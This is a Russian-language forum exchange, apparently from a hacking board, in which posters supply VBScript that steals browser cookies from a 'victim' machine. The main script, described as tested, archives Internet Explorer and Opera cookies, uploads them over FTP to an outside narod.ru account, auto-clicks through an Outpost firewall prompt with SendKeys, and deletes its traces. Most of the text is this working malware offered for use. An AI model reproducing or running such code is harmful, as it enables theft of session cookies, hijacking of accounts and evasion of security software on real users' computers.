Смотря куда утащить. На флешку например вот так можно: On Error Resume Next set fso=createobject("sсriрting.filesystemobject") set WshShell = WScript.CreateObject("WScript.Shell") fso.copyfolder WshShell.ExpandEnvironmentStrings("%USERPROFILE%") +"\Cookies", "E:\1" Set fso = Nothing Set WshShell = Nothing Wscript.Quit ' -выход Если надо от всех прямо совсем - давай папки, где это все хранится, напишу бесплатно, можно на ftp, можно на почту
Да, извеняюсь не уточнил, скрипт выполнятся на удаленной машине, следовательно надо утащить в интернет куда-нить) на ftp итп
В общем вот, проверено на XP SP2 + ftp на narod.ru, тырит куки от IE и Opera и отсылает в Winrar-архиве (который должен быть УЖЕ установлен у жертвы) на ftp на narod.ru, с Firefox там всё чуть сложнее, т.к. куки хранятся в C:\Documents and Settings\Хозяин\Application Data\Mozilla\Firefox\Profiles\b2f0512348.default, где папка b2f0512348.default - уникальная для каждого юзера, генерица на сколько я понял случайно и пока я не понял, где и как выцепить её название, наверное надо порыться в реестре. Ну и сам код: Code: On Error Resume Next 'Создаем временную папку для записи нужных нам результатов (лучше, если название будет УНИКАЛЬНОЕ, чтобы не было конфликтов) '========================================================== dim filesys, newfolder, newfolderpath newfolderpath = "c:\12345" set filesys=CreateObject("Scripting.FileSystemObject") If Not filesys.FolderExists(newfolderpath) Then Set newfolder = filesys.CreateFolder(newfolderpath) End If '========================================================== ' Тырим куки IE set WshShell1 = WScript.CreateObject("WScript.Shell") filePath = """C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Cookies""" 'Тут указываем, то что архивируем. archPath = newfolderpath & "\IE_cookies.rar" 'Куда архивируем, плюс название. winRarPath = """%systemdrive%\Program Files\WinRAR\rar.exe""" 'Путь к архиватору, у нас это winrar. Set fs = CreateObject("Scripting.FileSystemObject") Set WshShell = CreateObject("WScript.Shell") WshShell.Run winRarPath & " a -r " & archPath & " " & filePath, 0, True Set fs = Nothing Set WshShell = Nothing Set WshShell1 = Nothing '========================================================== ' Тырим куки OPERA set WshShell1 = WScript.CreateObject("WScript.Shell") filePath = """C:\Documents and Settings\" & WshShell1.ExpandEnvironmentStrings("%USERNAME%") & "\Application Data\Opera\Opera\profile\cookies4.dat""" 'Тут указываем, то что архивируем. archPath = newfolderpath & "\opera_cookies.rar" 'Куда архивируем, плюс название. winRarPath = """%systemdrive%\Program Files\WinRAR\rar.exe""" 'Путь к архиватору, у нас это winrar. Set fs = CreateObject("Scripting.FileSystemObject") Set WshShell = CreateObject("WScript.Shell") WshShell.Run winRarPath & " a -r " & archPath & " " & filePath, 0, True Set fs = Nothing Set WshShell = Nothing Set WshShell1 = Nothing '========================================================== 'Засовываем все стыренные куки в один архив set WshShell1 = WScript.CreateObject("WScript.Shell") filePath = newfolderpath 'Тут указываем, то что архивируем. archPath = newfolderpath & "\all_cookies.rar" 'Куда архивируем, плюс название. winRarPath = """%systemdrive%\Program Files\WinRAR\rar.exe""" 'Путь к архиватору, у нас это winrar. Set fs = CreateObject("Scripting.FileSystemObject") Set WshShell = CreateObject("WScript.Shell") WshShell.Run winRarPath & " a -r " & archPath & " " & filePath, 0, True Set fs = Nothing Set WshShell = Nothing Set WshShell1 = Nothing '========================================================== 'Отсылаем на ФТП на narod.ru 'Создаем файл сценария для FTP.EXE set FSO = CreateObject("Scripting.FileSystemObject") Set WSHshell = WScript.CreateObject("WScript.Shell") Set sDir = WSHshell.Environment("Process") ' - находим путь к папке Windows Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr") '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) cScript.WriteLine "Open ftp.narod.ru" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту cScript.WriteLine "Lollka" '- Имя пользователя cScript.WriteLine "1234" '- Пароль cScript.WriteLine "PUT " & newfolderpath & "\all_cookies.rar"'- А это файл который мы закачиваем cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru cScript.Close '- Конец записи в файл сценария ' Запускаем FTP-сценарий WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0 ' Обходим фаер (в данном случае Outpost, если не надо, закоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------) set w=CreateObject("WScript.Shell") a=0 do r=W.AppActivate("ftp.exe") if r then a=1 w.SendKeys "{tab 2}" w.SendKeys "{enter}" end if loop until a=1 set w=Nothing '--------------------------- Set fso = Nothing Set WSHshell = Nothing '========================================================== 'Заметаем следы (удаляем временную папку с нашими палевными архивами) WScript.Sleep 30000 'Задаем паузу, чтобы успело скопироваться на ФТП - чем больше, тем надежней, в данном случае 30 секунд set FSO = CreateObject("Scripting.FileSystemObject") Set MyFile = fso.GetFolder(newfolderpath) MyFile.Delete Set FSO = Nothing Set MyFile = Nothing Wscript.Quit ' -выход
